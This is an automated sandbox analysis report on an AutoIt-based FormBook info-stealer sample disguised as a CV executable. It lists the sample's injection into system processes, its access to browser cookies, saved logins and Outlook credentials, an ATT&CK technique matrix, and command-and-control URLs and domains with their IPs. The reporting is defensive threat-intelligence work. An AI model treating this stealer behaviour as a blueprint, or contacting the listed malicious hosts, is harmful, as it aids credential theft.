                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: DIRZUznVUfWlad.exe, 00000005.00000002.4144846532.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000000.1954893043.0000000001220000.00000002.00000001.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000000.2107688041.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A65C4 cpuid 0_2_003A65C4
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_003D091D
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003FB340 GetUserNameW,0_2_003FB340
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_003B1E8E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0039DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_81
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_XP
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_XPe
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_VISTA
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_7
                Source: CV Lic H&S Olivetti Renzo.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003D8C4F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003D923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561733 Sample: CV Lic H&S Olivetti Renzo.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 28 www.tals.xyz 2->28 30 www.rtpterbaruwaktu3.xyz 2->30 32 18 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 CV Lic H&S Olivetti Renzo.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 DIRZUznVUfWlad.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 winver.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 DIRZUznVUfWlad.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.connecty.live 203.161.43.228, 49991, 49997, 50004 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 bpgroup.site 74.48.143.82, 49835, 49842, 49848 TELUS-3CA Canada 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                CV Lic H&S Olivetti Renzo.exe71%ReversingLabsWin32.Trojan.AutoitInject
                CV Lic H&S Olivetti Renzo.exe73%VirustotalBrowse
                CV Lic H&S Olivetti Renzo.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                www.50food.com1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.fortevision.xyz/dash/?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA=0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/?3vNdCBvX=5Xkb80UCbQYKeySKU05ZgY0hyXkWVD4R8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOGKEDCrVhSay3c3WH5ydFiaohW8mA4vlt7iA=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.fortevision.xyz/dash/0%Avira URL Cloudsafe
                https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=0%Avira URL Cloudsafe
                https://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K0%Avira URL Cloudsafe
                http://www.sklad-iq.online/gdvz/?3vNdCBvX=42oDQZKHBS2RpvFPN57q1Tvu2doBJ10tXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OicxtKtIH3MbSxhASop5ADKNulvt1+Wm0v0/w=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.prhmcjdz.tokyo/cm9a/0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/?3vNdCBvX=cQzZIkxePH03UbtTShzK+VL4o2HqQJS38l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrbeJFZzqSBCnp1w20sGwly8q3n1+yWGeN50w=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/?3vNdCBvX=FpCuTMU+yGtduI5SdGSwoaTqY2YvqsELSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXjJlaW2N0MrSdIjCq1nBCaRQTsV/7KTtyEyY=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.jijievo.site/z9pi/0%Avira URL Cloudsafe
                http://www.prhmcjdz.tokyo/cm9a/?etx=BXy4elO0X&3vNdCBvX=AvN42DnS9Qw3kn1S+XKBV+xTI9DBYK88wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvqBbKt/3mV1eMDkmtL8V6ExRSF03F7PAG84A=0%Avira URL Cloudsafe
                http://www.bpgroup.site/mlxg/0%Avira URL Cloudsafe
                http://www.sklad-iq.online/gdvz/0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/?3vNdCBvX=l+g0G83zvX30P9FiLKUhk1gZnSMwjxKGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR6e8+1gk4cvE7j0i5NK3NPPZTmYTXI7istro=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.nmgzjwh.net/gb2h/0%Avira URL Cloudsafe
                http://www.tals.xyz/cpgr/0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs/f8c6/?3vNdCBvX=qZLxeIvUMpnHejM+2fTaZNrv2WO4y9kWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgsy7m2PREgKHVMtzZClnOVsBz8/E/4iFHS34=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/mv7p/0%Avira URL Cloudsafe
                http://www.50food.com/u9hy/0%Avira URL Cloudsafe
                http://www.sklad-iq.online0%Avira URL Cloudsafe
                http://www.nmgzjwh.net/gb2h/?3vNdCBvX=EASy0dFQ3+mIcpYj5hhEpzGwaoMP7Xj9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXHLAts09AmDfBZWK+en/xOBIa/+jQwvZyXLY=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://narman.com/0%Avira URL Cloudsafe
                http://www.connecty.live/6urf/0%Avira URL Cloudsafe
                http://www.ytsd88.top/8qt7/0%Avira URL Cloudsafe
                http://www.jijievo.site/z9pi/?3vNdCBvX=ied+cptg7UakpzhOx9uXTlAGHDuhbT7ej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipvFkLuNeVdA8j2seJJxWGnVEyQ8hCuTv0uPE=&etx=BXy4elO0X0%Avira URL Cloudsafe
                http://www.zriaraem-skiry.sbs/f8c6/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.50food.com
                147.255.21.187
                truetrueunknown
                all.wjscdn.com
                154.90.58.209
                truetrue
                  unknown
                  ymx01.cn
                  8.210.46.21
                  truetrue
                    unknown
                    www.nmgzjwh.net
                    172.67.168.228
                    truetrue
                      unknown
                      www.sklad-iq.online
                      194.58.112.174
                      truetrue
                        unknown
                        www.zriaraem-skiry.sbs
                        104.21.42.77
                        truetrue
                          unknown
                          www.supernutra01.online
                          172.67.220.36
                          truefalse
                            unknown
                            bpgroup.site
                            74.48.143.82
                            truetrue
                              unknown
                              www.connecty.live
                              203.161.43.228
                              truetrue
                                unknown
                                ssl.goentri.com
                                76.223.74.74
                                truetrue
                                  unknown
                                  www.tals.xyz
                                  13.248.169.48
                                  truetrue
                                    unknown
                                    www.ytsd88.top
                                    47.76.213.197
                                    truefalse
                                      high
                                      www.fortevision.xyz
                                      13.248.169.48
                                      truetrue
                                        unknown
                                        rtpterbaruwaktu3.xyz
                                        103.21.221.87
                                        truetrue
                                          unknown
                                          www.bpgroup.site
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.grandesofertas.fun
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.jijievo.site
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.rtpterbaruwaktu3.xyz
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.prhmcjdz.tokyo
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.rtpterbaruwaktu3.xyz/mv7p/?3vNdCBvX=5Xkb80UCbQYKeySKU05ZgY0hyXkWVD4R8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOGKEDCrVhSay3c3WH5ydFiaohW8mA4vlt7iA=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fortevision.xyz/dash/?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA=true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tals.xyz/cpgr/?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.bpgroup.site/mlxg/?3vNdCBvX=cQzZIkxePH03UbtTShzK+VL4o2HqQJS38l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrbeJFZzqSBCnp1w20sGwly8q3n1+yWGeN50w=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.prhmcjdz.tokyo/cm9a/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sklad-iq.online/gdvz/?3vNdCBvX=42oDQZKHBS2RpvFPN57q1Tvu2doBJ10tXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OicxtKtIH3MbSxhASop5ADKNulvt1+Wm0v0/w=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fortevision.xyz/dash/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ytsd88.top/8qt7/?3vNdCBvX=FpCuTMU+yGtduI5SdGSwoaTqY2YvqsELSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXjJlaW2N0MrSdIjCq1nBCaRQTsV/7KTtyEyY=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.bpgroup.site/mlxg/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.connecty.live/6urf/?3vNdCBvX=l+g0G83zvX30P9FiLKUhk1gZnSMwjxKGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR6e8+1gk4cvE7j0i5NK3NPPZTmYTXI7istro=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.jijievo.site/z9pi/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.nmgzjwh.net/gb2h/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tals.xyz/cpgr/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.zriaraem-skiry.sbs/f8c6/?3vNdCBvX=qZLxeIvUMpnHejM+2fTaZNrv2WO4y9kWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgsy7m2PREgKHVMtzZClnOVsBz8/E/4iFHS34=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sklad-iq.online/gdvz/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.prhmcjdz.tokyo/cm9a/?etx=BXy4elO0X&3vNdCBvX=AvN42DnS9Qw3kn1S+XKBV+xTI9DBYK88wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvqBbKt/3mV1eMDkmtL8V6ExRSF03F7PAG84A=true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.rtpterbaruwaktu3.xyz/mv7p/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.50food.com/u9hy/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.nmgzjwh.net/gb2h/?3vNdCBvX=EASy0dFQ3+mIcpYj5hhEpzGwaoMP7Xj9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXHLAts09AmDfBZWK+en/xOBIa/+jQwvZyXLY=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.connecty.live/6urf/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.jijievo.site/z9pi/?3vNdCBvX=ied+cptg7UakpzhOx9uXTlAGHDuhbT7ej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipvFkLuNeVdA8j2seJJxWGnVEyQ8hCuTv0uPE=&etx=BXy4elO0Xtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ytsd88.top/8qt7/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.zriaraem-skiry.sbs/f8c6/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabwinver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://reg.ruwinver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.000000000414C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          high
                                                          https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_autowinver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8Kwinver.exe, 00000006.00000002.4146215002.00000000059C4000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000002E74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2341761570.000000003EA84000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_landwinver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.bt.cn/?from=404winver.exe, 00000006.00000002.4146215002.0000000005CE8000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003198000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.ecosia.org/newtab/winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_howinver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sklad-iq.onlineDIRZUznVUfWlad.exe, 00000007.00000002.4147404593.0000000004F39000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.reg.ru/sozdanie-saita/winver.exe, 00000006.00000002.4146215002.0000000006C9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csswinver.exe, 00000006.00000002.4146215002.00000000064C2000.00000004.10000000.00040000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003972000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://narman.com/DIRZUznVUfWlad.exe, 00000007.00000002.4145384093.0000000003E28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winver.exe, 00000006.00000002.4148412401.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
